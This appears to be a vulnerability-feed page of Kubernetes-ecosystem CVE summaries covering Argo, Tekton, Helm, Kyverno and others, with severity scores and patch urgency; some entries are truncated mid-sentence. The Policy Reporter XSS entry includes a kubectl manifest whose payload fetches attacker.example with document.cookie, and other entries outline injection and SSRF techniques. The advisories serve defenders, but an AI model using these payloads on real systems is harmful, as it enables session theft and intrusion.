Template injection in Rancher Local Path Provisioner allows Kubernetes cluster operators with ConfigMap edit permissions to escalate privileges to node-level root access. Attackers with write access to the local-path-config ConfigMap can inject malicious Pod templates that bypass security controls, creating privileged containers with full host filesystem access. This enables theft of ServiceAccount tokens from co-located pods, access to other tenants' persistent volume data, and arbitrary modification of host node files. Vendor-released patch: v0.0.36. CVSS 8.7 (High) reflects the high-privilege prerequisite (PR:H) but scope change to container escape (S:C). No public exploit identified at time of analysis, though exploitation is straightforward for authenticated cluster operators.

Kubernetes Docker Information Disclosure +1
NVD GitHub VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

External Secrets Operator versions 0.1.0 through 2.4.0 allow authenticated users with ExternalSecret creation permissions to escalate privileges by crafting Service Account token templates that cause the operator to generate long-lived tokens for any service account in the namespace. An attacker can impersonate service accounts without requiring direct TokenRequest or Secret creation permissions, effectively bypassing RBAC controls. The attack requires the attacker already has ExternalSecret creation permissions and the cluster must have service account token generation enabled, limiting the practical scope to already-privileged users seeking lateral privilege expansion within a namespace.

Kubernetes Authentication Bypass
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Server-side request forgery in MCP Registry's HTTP namespace verification endpoint allows unauthenticated attackers to reach internal IPv4 addresses via specially-crafted IPv6 addresses that encode or tunnel to RFC1918 and cloud-metadata services. The vulnerability exists in the private-address blocklist used by `safeDialContext`, which fails to block IPv6 6to4 (2002::/16), NAT64 well-known (64:ff9b::/96), NAT64 local-use (64:ff9b:1::/48), and deprecated site-local (fec0::/10) prefixes. On dual-stack and IPv6-only cloud deployments (GKE IPv6, AWS IPv6-only EC2, Azure NAT64), this enables direct connections to metadata services and internal Kubernetes API servers. No public exploit code identified at time of analysis, but proof-of-concept has been demonstrated against the production registry.

Kubernetes SSRF Microsoft +2
NVD GitHub VulDB
EPSS 0% CVSS 3.7
LOW PATCH Monitor

Server-Side Request Forgery (SSRF) in nuxt-og-image 6.2.5 through 6.4.8 allows remote attackers to bypass the incomplete IPv6 denylist and redirect validation, reaching internal IP addresses and services through incomplete IPv6 prefix filtering and unauthenticated HTTP redirect following. The vulnerability affects the OG image rendering component used by Nuxt applications, enabling attackers to leak internal service responses by injecting crafted IPv6-mapped addresses or chaining external redirects to internal targets.

Kubernetes Redis SSRF +2
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Denial-of-service in vm2 Node.js sandbox allows unauthenticated remote attackers to crash host processes via unbounded Buffer.alloc() calls. The vm2 library's timeout mechanism cannot interrupt synchronous C++ native calls, enabling attackers to bypass configured timeout limits and exhaust host heap memory with a single HTTP request. Version 3.11.0 patches this flaw by introducing bufferAllocLimit controls. Publicly available exploit code exists (GHSA-6785-pvv7-mvg7 includes working POC), and while EPSS data is unavailable and the vulnerability is not listed in CISA KEV, the vendor-confirmed POC demonstrates reliable exploitation against default configurations.

Kubernetes Denial Of Service Docker +1
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Remote unauthenticated attackers can crash Node.js processes running vm2 <= 3.10.5 by triggering an unhandled Promise rejection that terminates the host application. The vulnerability exploits an incomplete fix for CVE-2026-22709 - while previous patches sanitized `.then()` and `.catch()` callback chains, they failed to intercept unhandled rejections originating from Promise constructor executors. Publicly available exploit code exists (GitHub advisory GHSA-hw58-p9xv-2mjh). The attack requires minimal resources (150-byte HTTP request) but achieves high impact by crashing entire server processes serving all concurrent users, with demonstrated persistent DoS despite container orchestration restart policies.

Kubernetes Denial Of Service Docker +1
NVD GitHub VulDB
EPSS 0%
LOW PATCH Monitor

etcd RBAC authorization bypass allows authenticated users to read unauthorized data or attach leases via PrevKv or lease attachment features in transaction Put requests, circumventing role-based access control checks. Affects etcd 3.4.x through 3.6.x before patched versions 3.4.44, 3.5.30, and 3.6.11. While Kubernetes deployments are typically not affected because the API server handles its own authorization, etcd deployments with reliance on etcd's built-in RBAC-particularly those managed directly or used outside Kubernetes-face exposure to privilege escalation and unauthorized data access by already-authenticated users.

Authentication Bypass Kubernetes
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Kubetail Dashboard prior to version 0.14.0 fails to validate the Origin header on WebSocket connection upgrades, enabling Cross-Site WebSocket Hijacking (CSWSH) attacks. An authenticated user visiting a malicious web page can be exploited to stream their Kubernetes container logs-including credentials, tokens, and PII often present in logs-to an attacker-controlled server. The vulnerability affects both desktop deployments at localhost:7500 and cluster deployments behind HTTP basic auth, with browser ambient credentials automatically attached to the WebSocket handshake.

Kubernetes Microsoft Docker +3
NVD GitHub VulDB
EPSS 0% CVSS 9.6
CRITICAL PATCH Act Now

Kubernetes Secret extraction in Argo CD v3.2.0-3.2.10 and v3.3.0-3.3.8 allows authenticated users with read-only application permissions to retrieve plaintext credential data including service account tokens, TLS certificates, database passwords, and API keys via the ServerSideDiff endpoint. The vulnerability exists due to missing data masking in the gRPC/REST ServerSideDiff function, which returns raw Kubernetes Server-Side Apply dry-run responses containing unredacted Secret values from etcd when applications are annotated with 'IncludeMutationWebhook=true'. A functional proof-of-concept exploit exists demonstrating automated extraction of all accessible secrets. Vendor-released patches (3.2.11, 3.3.9) are available. CVSS 9.6 reflects network-exploitable, low-complexity attack requiring only low-privilege authenticated access with cross-scope high confidentiality/integrity impact.

Kubernetes Information Disclosure
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

ServiceAccount impersonation bypass in Rancher Fleet allows tenants with git push access to multi-tenant clusters to read secrets from any namespace across all downstream clusters. Two distinct code paths failed to properly apply RBAC constraints: Helm's lookup function executed with cluster-admin credentials instead of the impersonated ServiceAccount, and valuesFrom secret references in fleet.yaml bypassed namespace isolation. Confirmed active exploitation status unknown (not in CISA KEV). CVSS 9.9 with scope-change modifier reflects potential credential leakage to external services. Fleet versions 0.12.0 through 0.15.0 affected across multiple Rancher release branches. Patches available for all supported versions with detailed version matrix provided by SUSE.

Authentication Bypass Kubernetes Suse
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Unauthenticated remote attackers crash Gotenberg 8.x (≤ 8.31.0) by triggering a race condition between webhook goroutine context reuse and Echo framework connection pooling. When webhook middleware spawns an async goroutine holding an `echo.Context` reference, the synchronous handler returns immediately, recycling the context to Echo's `sync.Pool`. Concurrent requests reset the pooled context, causing unchecked type assertions in the still-running webhook goroutine to panic outside any `recover()` scope, terminating the process with exit code 2. Twenty-four webhook requests plus sixty concurrent GET requests demonstrate reliable two-second crash windows. No patch was available at initial disclosure; upstream commit fixes the panic in version 8.32.0. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) reflects trivial unauthenticated network exploitation producing complete service disruption.

Kubernetes Denial Of Service Python +3
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

{{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., `<img src=x onerror=alert(1)>` padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink. This vulnerability was reproduced on the latest policy reporter UI version - 2.5.1. Prerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access) Create a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser. ```bash kubectl apply -f - <<'EOF' apiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2) kind: PolicyReport metadata: name: xss-poc namespace: default results: - message: "test" policy: xss-test-policy rule: check-rule result: fail properties: advisory: "<img src=x onerror=\"fetch('[https://attacker.example/c?c='+document.cookie](https://attacker.example/c?c=%27+document.cookie))\"> padding padding padding" EOF ``` <img width="1562" height="1061" alt="Снимок экрана - 2026-04-21 в 10 52 17" src="https://github.com/user-attachments/assets/fe542ccb-1662-44cb-802f-7998aa145db7" /> <img width="1041" height="939" alt="Снимок экрана - 2026-04-21 в 10 51 44" src="https://github.com/user-attachments/assets/bc07cf20-aea5-4a90-838f-c428d88a92b7" /> XSS

Kubernetes XSS
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Kubewarden versions before 1.35.0 permit RBAC reconnaissance attacks when users with AdmissionPolicy or AdmissionPolicyGroup creation privileges craft policies using the unchecked `can_i` host capability. The vulnerability allows enumeration of any user or service account permissions across the cluster via SubjectAccessReview requests executed with policy-server privileges, despite the absence of context-aware resource grants. This information disclosure enables attackers to discover sensitive permission configurations without requiring cluster-wide policy creation rights, a capability not available by default but exploitable when granted.

Authentication Bypass Privilege Escalation Information Disclosure +1
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Path traversal in MinIO's ReadMultiple internode storage-REST endpoint allows authenticated cluster peers or root-credential holders to read arbitrary files from the host filesystem outside configured drive roots. Distributed-erasure (multi-node) deployments are affected; single-node standalone deployments are not. The vulnerability exists in all releases from RELEASE.2022-07-24T01-54-52Z through RELEASE.2025-09-07T16-13-09Z and has been fixed as of MinIO AIStor RELEASE.2024-10-23T19-38-07Z (with security patch RELEASE.2026-04-14T21-32-45Z recommended). No public exploit code or active exploitation has been identified at time of analysis.

Kubernetes Microsoft Docker +2
NVD GitHub VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Argo Workflows executor logs artifact repository credentials in plaintext to pod logs during artifact operations, exposing S3 access/secret keys, GCS service account keys, Azure storage keys, and Git passwords. Users with Kubernetes RBAC permissions to read pod logs in the workflow namespace can extract these credentials directly from workflow execution logs. This vulnerability affects Argo Workflows v4.0.0 through v4.0.4 and represents an incomplete fix of CVE-2025-62157. Vendor-released patch (v4.0.5) is available with GitHub commit bdd40908 removing credential-bearing struct logging. No public exploit identified at time of analysis, though exploitation is trivial given the included working proof-of-concept YAML.

Kubernetes Microsoft Information Disclosure +1
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Argo Workflows v3 (< 3.7.14) and v4 (< 4.0.5) allow users to bypass templateReferencing Strict/Secure mode restrictions by setting WorkflowSpec fields like hostNetwork, serviceAccountName, securityContext, tolerations, and volumes. The incomplete fix for CVE-2026-31892 only blocked podSpecPatch but left other security-sensitive fields unvalidated. Authenticated users with create Workflow permission can inject host network access, switch service accounts, modify pod security contexts, or schedule on control-plane nodes despite referencing hardened WorkflowTemplates. Vendor-released patch: v3.7.14 and v4.0.5 (commit 2727f3f). No public exploit identified at time of analysis, but exploitation is straightforward given detailed reproduction steps in the advisory.

Authentication Bypass Kubernetes
NVD GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Memory exhaustion crashes Argo Workflows server via unauthenticated multi-gigabyte webhook requests to the publicly accessible `/api/v1/events/` endpoint. The Webhook Interceptor's `io.ReadAll` call allocates unbounded memory before signature verification, enabling remote attackers to trigger out-of-memory (OOM) conditions without authentication or credentials. Vendor-released patches enforce a 2MB body size limit via `io.LimitReader`. Publicly available exploit code exists (conceptual proof-of-concept published in GitHub security advisory GHSA-jcc8-g2q4-9fxq). No active exploitation confirmed by CISA KEV at time of analysis, but the low attack complexity (CVSS AV:N/AC:L/PR:N) and public PoC create immediate risk for internet-exposed Argo Workflows deployments.

Kubernetes Denial Of Service
NVD GitHub VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Missing authorization checks in Argo Workflows v4.0.0-4.0.4 allow any authenticated user-even those with fake Bearer tokens-to create, read, update, and delete Kubernetes ConfigMaps containing workflow synchronization limits. The ConfigMap-backed sync provider (server/sync/sync_cm.go) completely omits auth.CanI permission validation on all four CRUD endpoints. Publicly available exploit code exists (detailed PoC in advisory). CVSS 8.5 reflects network-accessible authentication bypass enabling high integrity/availability impact through denial-of-service and arbitrary ConfigMap manipulation. Patch released in version 4.0.5 adding checkConfigMapPermission() calls to validate Kubernetes RBAC before operations.

Authentication Bypass Denial Of Service Information Disclosure +1
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Authenticated users with low privileges can read cleartext Kubernetes Secret data through Argo CD's ServerSideDiff feature in versions 3.2.0-3.2.10 and 3.3.0-3.3.8. This scope-changing vulnerability (CVSS:3.1 S:C) allows attackers to access sensitive credential data managed by Kubernetes, including database passwords, API tokens, and certificates, by exploiting the server-side diff functionality. With a 7.7 CVSS score and low attack complexity (AC:L), this represents a significant confidentiality breach requiring only network access and basic authentication-no public exploit identified at time of analysis, but the technical barrier to exploitation is minimal.

Information Disclosure Kubernetes Argo Cd
NVD GitHub VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Traefik versions prior to 2.11.43, 3.6.14, and 3.7.0-rc.2 fail to enforce cross-namespace isolation for middleware references nested inside Chain middlewares, allowing actors with permission to create CRDs in their own namespace to bypass the allowCrossNamespace=false restriction and apply middleware from arbitrary namespaces. This authorization bypass affects Kubernetes clusters relying on namespace isolation controls and can enable unauthorized reuse of security-sensitive middleware policies across namespace boundaries.

Kubernetes Information Disclosure RCE +2
NVD GitHub
Awaiting Data

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/04/11. ions before 0.23 for Perl does not validate IPv6 group count, which may allow IP ACL bypass (Stig Palmquist <stig@...g.io>) CVE-2026-40199: Net::CIDR::Lite versions before 0.23 for Perl mishandles IPv4 mapped IPv6 addresses, which may allow IP ACL bypas… (Stig Palmquist <stig@...g.io>) [kubernetes] CVE-2026-3865: CSI Driver for SMB path traversal via subDir may delete unintended directories on the SMB s… (Vinayak Goyal <vinayakankugoyal@...il.c…) CPython [CVE-2026-1502] HTTP client proxy tunnel headers not validated for CR/LF (Alan Coopersmith <alan.coopersmith@...cle.com>) CPython [CVE-2026-3446] Base64 d

Kubernetes Path Traversal
NVD
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Cross-namespace privilege escalation in Kyverno 1.17.x allows authenticated namespace administrators to bypass RBAC controls and read ConfigMaps from any Kubernetes namespace. The vulnerability exploits unvalidated `configMap.namespace` field in Kyverno's ConfigMap context loader, enabling attackers to leverage Kyverno's privileged service account permissions. This is a regression following incomplete fix for CVE-2026-22039, which addressed the same issue in `apiCall` context but missed the ConfigMap loader. Patch available in version 1.17.2. CVSS 7.7 with Changed Scope indicates significant multi-tenant cluster risk; EPSS data not available but the regression nature and RBAC bypass impact warrant immediate patching in multi-tenant environments.

Kubernetes Authentication Bypass Privilege Escalation +1
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Contour is a Kubernetes ingress controller using Envoy proxy. From v1.19.0 to before v1.33.4, v1.32.5, and v1.31.6, Contour's Cookie Rewriting feature is vulnerable to Lua code injection. An attacker with RBAC permissions to create or modify HTTPProxy resources can craft a malicious value in spec.routes[].cookieRewritePolicies[].pathRewrite.value or spec.routes[].services[].cookieRewritePolicies[].pathRewrite.value that results in arbitrary code execution in the Envoy proxy. The cookie rewriting feature is internally implemented using Envoy's HTTP Lua filter. User-controlled values are interpolated into Lua source code using Go text/template without sufficient sanitization. The injected code only executes when processing traffic on the attacker's own route, which they already control. However, since Envoy runs as shared infrastructure, the injected code can also read Envoy's xDS client credentials from the filesystem or cause denial of service for other tenants sharing the Envoy instance. This vulnerability is fixed in v1.33.4, v1.32.5, and v1.31.6.

Kubernetes Denial Of Service Code Injection +2
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From 3.6.5 to 4.0.4, an unchecked array index in the pod informer's podGCFromPod() function causes a controller-wide panic when a workflow pod carries a malformed workflows.argoproj.io/pod-gc-strategy annotation. Because the panic occurs inside an informer goroutine (outside the controller's recover() scope), it crashes the entire controller process. The poisoned pod persists across restarts, causing a crash loop that halts all workflow processing until the pod is manually deleted. This vulnerability is fixed in 4.0.5 and 3.7.14.

Kubernetes Denial Of Service Argo Workflows
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Cache poisoning in @astrojs/node versions 9.4.4 and earlier allows unauthenticated remote attackers to poison CDN caches by sending malformed if-match headers to static asset endpoints, causing the server to return 500 errors with immutable one-year cache directives instead of the correct 412 Precondition Failed response. This vulnerability affects all subsequent requests to poisoned assets until the cache expires, breaking application functionality for legitimate users. The vulnerability is not actively exploited in the wild, but proof-of-concept exploitation is straightforward and requires only a single crafted HTTP request.

Kubernetes Information Disclosure Mozilla
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Prior to 1.11.1, a validation bypass in the VolumeMount path restriction allows mounting volumes under restricted /tekton/ internal paths by using .. path traversal components. The restriction check uses strings.HasPrefix without filepath.Clean, so a path like /tekton/home/../results passes validation but resolves to /tekton/results at runtime. This vulnerability is fixed in 1.11.1.

Kubernetes Path Traversal Red Hat +1
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Prior to 1.11.1, the HTTP resolver's FetchHttpResource function calls io.ReadAll(resp.Body) with no response body size limit. Any tenant with permission to create TaskRuns or PipelineRuns that reference the HTTP resolver can point it at an attacker-controlled HTTP server that returns a very large response body within the 1-minute timeout window, causing the tekton-pipelines-resolvers pod to be OOM-killed by Kubernetes. Because all resolver types (Git, Hub, Bundle, Cluster, HTTP) run in the same pod, crashing this pod denies resolution service to the entire cluster. Repeated exploitation causes a sustained crash loop. The same vulnerable code path is reached by both the deprecated pkg/resolution/resolver/http and the current pkg/remoteresolution/resolver/http implementations. This vulnerability is fixed in 1.11.1.

Denial Of Service Kubernetes Suse +1
NVD GitHub
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. From 1.0.0 to before 1.11.0, the git resolver's revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=<binary>. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. This vulnerability is fixed in 1.11.1.

Kubernetes RCE Pipeline
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

An incorrect authorization vulnerability exists in Esri Portal for ArcGIS 11.4, 11.5 and 12.0 on Windows, Linux and Kubernetes that did not correctly check permissions assigned to developer credentials.

Information Disclosure Kubernetes Microsoft
NVD VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Credential leakage in Tekton Pipelines git resolver allows authenticated users to exfiltrate system-configured Git API tokens (GitHub PAT, GitLab tokens) by directing the resolver to attacker-controlled endpoints. Affects versions 1.0.0 through 1.10.0 when users omit the token parameter in TaskRun or PipelineRun configurations. CVSS 7.7 with scope change reflects cross-tenant credential theft potential in multi-tenant Kubernetes environments. No active exploitation confirmed (not in CISA KEV), but exploitation is straightforward for authenticated cluster users with TaskRun/PipelineRun creation privileges.

Information Disclosure Kubernetes Gitlab
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Tekton Pipelines 0.43.0 through 1.11.0 allows authenticated attackers to bypass trusted resource verification policies via unanchored regular expression patterns that match substrings rather than exact resource sources, enabling policy manipulation and unauthorized verification mode changes. The vulnerability stems from Go's regexp.MatchString function matching patterns anywhere within a string rather than requiring full anchoring, permitting attackers to craft source URIs containing trusted patterns as substrings to trigger unintended policy matches and potentially apply weaker verification keys or modes.

Authentication Bypass Kubernetes
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Hot Chocolate's `Utf8GraphQLParser` is a recursive descent parser with no recursion depth limit. A crafted GraphQL document with deeply nested selection sets, object values, list values, or list types can trigger a `StackOverflowException` on payloads as small as **40 KB**. Because `StackOverflowException` is **uncatchable in .NET** (since .NET 2.0), the entire worker process is terminated immediately. All in-flight HTTP requests, background `IHostedService` tasks, and open WebSocket subscriptions on that worker are dropped. The orchestrator (Kubernetes, IIS, etc.) must restart the process. This occurs **before any validation rules run** - `MaxExecutionDepth`, complexity analyzers, persisted query allow-lists, and custom `IDocumentValidatorRule` implementations cannot intercept the crash because `Utf8GraphQLParser.Parse` is invoked before validation. The existing `MaxAllowedFields=2048` limit does not help because the crashing payloads contain very few fields. **Severity:** Critical (9.1) - `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` - **v12 line:** Fixed in `12.22.7` - **v13 line:** Fixed in `13.9.16` - **v14 line:** Fixed in `14.3.1` - **v15 line:** Fixed in `15.1.14` The fix adds a `MaxAllowedRecursionDepth` option to `ParserOptions` with a safe default, and enforces it across all recursive parser methods (`ParseSelectionSet`, `ParseValueLiteral`, `ParseObject`, `ParseList`, `ParseTypeReference`, etc.). When the limit is exceeded, a catchable `SyntaxException` is thrown instead of overflowing the stack. There is no application-level workaround. `StackOverflowException` cannot be caught in .NET. The only mitigation is to upgrade to a patched version. Operators can reduce (but not eliminate) risk by limiting HTTP request body size at the reverse proxy or load balancer layer, though the smallest crashing payload (40 KB) is well below most default body size limits and is highly compressible (~few hundred bytes via gzip). - Fix for v15: https://github.com/ChilliCream/graphql-platform/pull/9528

Denial Of Service Kubernetes
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Race condition in pyLoad's Flask session cookie handler allows unauthenticated attackers to manipulate the SESSION_COOKIE_SECURE flag globally across all concurrent requests by spoofing the X-Forwarded-Proto header. On deployments behind a TLS-terminating proxy, this enables session cookie downgrade attacks resulting in plaintext cookie transmission; on default plain HTTP deployments, it causes session denial of service by forcing the Secure flag and breaking all concurrent user sessions. The vulnerability requires no authentication and exploits a multi-threaded race window in the Cheroot WSGI server (request_queue_size=512) combined with missing proxy origin validation (acknowledged TODO in code).

Denial Of Service Kubernetes Python
NVD GitHub
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Command injection in mcp-server-kubernetes port_forward function allows authenticated network attackers to expose internal Kubernetes services to external networks or bypass namespace restrictions. The vulnerability (CVSS 8.3) stems from unsafe string concatenation and space-splitting of kubectl arguments, enabling arbitrary flag injection via fields like resourceName or namespace. Attackers can inject '--address=0.0.0.0' to bind port-forwards on all network interfaces, exposing databases and internal APIs beyond localhost. Affects mcp-server-kubernetes <= 3.4.0. No public exploit identified at time of analysis, though exploitation requires only low complexity (AC:L) with authenticated access (PR:L).

RCE Kubernetes
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Kyverno's apiCall service helper automatically injects the controller's ServiceAccount token into HTTP requests when ClusterPolicy or GlobalContextEntry authors omit an Authorization header, enabling token exfiltration to attacker-controlled endpoints via confused deputy vulnerability. Affects deployments where policy YAML repositories are compromised (GitOps threat model) or ClusterPolicy creation is possible. CVSS 8.1 (High) reflects network attack vector with low complexity and low privileges required. No CISA KEV listing or public exploit identified at time of analysis, but GitHub advisory includes working proof-of-concept demonstrating token injection and exfiltration.

Code Injection Kubernetes Canonical
NVD GitHub VulDB
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Kubernetes Service Account token disclosure in the odh-dashboard component of Red Hat OpenShift AI (RHOAI) lets an authenticated low-privileged user retrieve SA tokens via an exposed NodeJS endpoint, then reuse them to reach Kubernetes resources beyond the dashboard's intended scope. Rated CVSS 9.9 with a changed scope, the flaw effectively converts limited dashboard access into broad cluster access. There is no public exploit identified at time of analysis and EPSS is very low (0.06%), but a vendor patch is already available via Red Hat errata.

Kubernetes Red Hat Authentication Bypass +2
NVD VulDB
EPSS 0% CVSS 3.1
LOW PATCH Monitor

Flux notification-controller prior to version 1.8.3 fails to validate the email claim in Google OIDC tokens used for Pub/Sub push authentication, allowing any valid Google-issued token to trigger unauthorized reconciliations via the gcr Receiver webhook endpoint. An attacker must know or discover the webhook URL (generated from a random token stored in a Kubernetes Secret) to exploit this vulnerability; however, practical impact is severely limited because Flux reconciliations are idempotent and deduplicated, meaning unauthorized requests result in no operational changes to cluster state unless the underlying Git/OCI/Helm sources have been modified.

Google Kubernetes Authentication Bypass
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Helm versions 3.20.1 and earlier, and 4.1.3 and earlier, allow local attackers with user interaction to write Chart contents to arbitrary directories via path traversal in the helm pull --untar command. A specially crafted Chart will bypass the expected subdirectory naming convention and extract files to the current working directory or a user-specified destination, potentially overwriting existing files. Vendor-released patches are available in versions 3.20.2 and 4.1.4.

Path Traversal Kubernetes Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Apache Tomcat's cloud membership clustering component logs Kubernetes bearer tokens in plaintext, enabling unauthenticated remote attackers to extract authentication credentials from log files. Affects Tomcat 9.0.13-9.0.116, 10.1.0-M1-10.1.53, and 11.0.0-M1-11.0.20. CVSS 7.5 (High) reflects confidentiality impact; no public exploit identified at time of analysis. Exploitation requires network access to log files or log aggregation systems, potentially enabling privilege escalation within Kubernetes clusters.

Apache Kubernetes Tomcat +3
NVD VulDB
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Aiven Operator versions 0.31.0 through 0.36.x allow developers with ClickhouseUser CRD creation permissions in their own namespace to exfiltrate secrets from arbitrary namespaces by exploiting a confused deputy vulnerability in the operator's ClusterRole. An attacker can craft a malicious ClickhouseUser resource that causes the operator to read privileged credentials (database passwords, API keys, service tokens) from production namespaces and write them into the attacker's namespace with a single kubectl apply command. The vulnerability is fixed in version 0.37.0.

Kubernetes Privilege Escalation
NVD GitHub VulDB
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Helm 4.0.0 through 4.1.3 silently installs Kubernetes plugins without cryptographic provenance verification even when signature verification is explicitly required, allowing local attackers to deliver malicious plugins that execute with Helm's privileges during installation. The flaw (CWE-636: Not Failing Securely) enables supply chain attacks where unsigned or tampered plugins bypass security controls intended to validate plugin integrity. Fixed in Helm 4.1.4. EPSS score is 2nd percentile (0.01% exploitation probability), no active exploitation confirmed, SSVC assessment indicates total technical impact but non-automatable exploitation requiring user interaction.

Information Disclosure Kubernetes Helm
NVD GitHub VulDB HeroDevs
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Path traversal in Helm 4.0.0-4.1.3 allows local attackers to write arbitrary files during plugin installation or update by embedding '/../' sequences in the plugin.yaml version field, achieving high integrity impact across system and vulnerable component scopes. EPSS score is 2nd percentile (0.01%) with no active exploitation or public POC identified, suggesting low immediate risk despite 8.4 CVSS score. Vendor patch released in version 4.1.4.

Path Traversal Kubernetes Helm
NVD GitHub VulDB HeroDevs
EPSS 0% CVSS 6.4
MEDIUM This Month

Container privilege escalation in Red Hat Multicluster Engine for Kubernetes allows authenticated local attackers to escalate from non-root container execution to full root privileges by exploiting group-writable permissions on the /etc/passwd file created during container image build time, enabling arbitrary UID assignment including UID 0.

Privilege Escalation Kubernetes
NVD VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Denial-of-service and information disclosure in Podman Desktop prior to 1.26.2 stem from an unauthenticated HTTP server that any network attacker can reach without credentials or user interaction. By abusing missing connection limits and timeouts, an attacker exhausts file descriptors and kernel memory to crash the application or freeze the entire host, while verbose error responses leak internal filesystem paths and system details (including Windows usernames). SSVC marks exploitation as proof-of-concept and automatable; publicly available exploit code exists, but EPSS probability is low (0.06%, 19th percentile).

Kubernetes Information Disclosure Microsoft +1
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Improper certificate validation in Red Hat's Open Cluster Management (OCM) and Multicluster Engine for Kubernetes allows managed cluster administrators with high-level local access to forge client certificates, achieving cross-cluster privilege escalation to other managed clusters including the hub cluster. The CVSS 8.2 rating reflects high impact across confidentiality, integrity, and availability with scope change, though exploitation requires existing high-privilege local access (PR:H) and local attack vector (AV:L). No public exploit code or CISA KEV listing identified at time of analysis, though technical details are publicly documented in researcher blog post.

Privilege Escalation Red Hat Kubernetes +1
NVD
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Command injection in BentoML's cloud deployment path allows remote code execution on BentoCloud build infrastructure via malicious bentofile.yaml configurations. While commit ce53491 fixed command injection in local Dockerfile generation by adding shlex.quote protection, the cloud deployment code path (deployment.py:1648) remained vulnerable, directly interpolating system_packages into shell commands without sanitization. Attackers can inject shell metacharacters through bentofile.yaml to execut

RCE Command Injection Docker +2
NVD GitHub VulDB
EPSS 0% CVSS 10.0
CRITICAL PATCH NO ACTION HOSTED Monitor

Microsoft Azure Kubernetes Service (AKS) contains an improper authorization vulnerability enabling unauthenticated remote attackers to elevate privileges over a network with critical impact across confidentiality, integrity, and availability. The CVSS 10.0 critical rating reflects network-accessible exploitation requiring no authentication, low complexity, and scope change allowing compromise beyond the vulnerable component. No public exploit identified at time of analysis, though the authentication bypass nature and maximum severity warrant immediate priority.

Microsoft Kubernetes Authentication Bypass
NVD VulDB
EPSS 0% CVSS 10.0
CRITICAL PATCH Act Now

Unauthenticated remote attackers can trigger complete database overwrites, server-side file reads, and SSRF attacks against Dgraph graph database servers (v24.x, v25.x prior to v25.3.1) via the admin API's restoreTenant mutation. The mutation bypasses all authentication middleware due to missing authorization configuration, allowing attackers to provide arbitrary backup source URLs (including file:// schemes for local filesystem access), S3/MinIO credentials, Vault configuration paths, and encry

Authentication Bypass SSRF Hashicorp +2
NVD GitHub VulDB
EPSS 0% CVSS 8.7
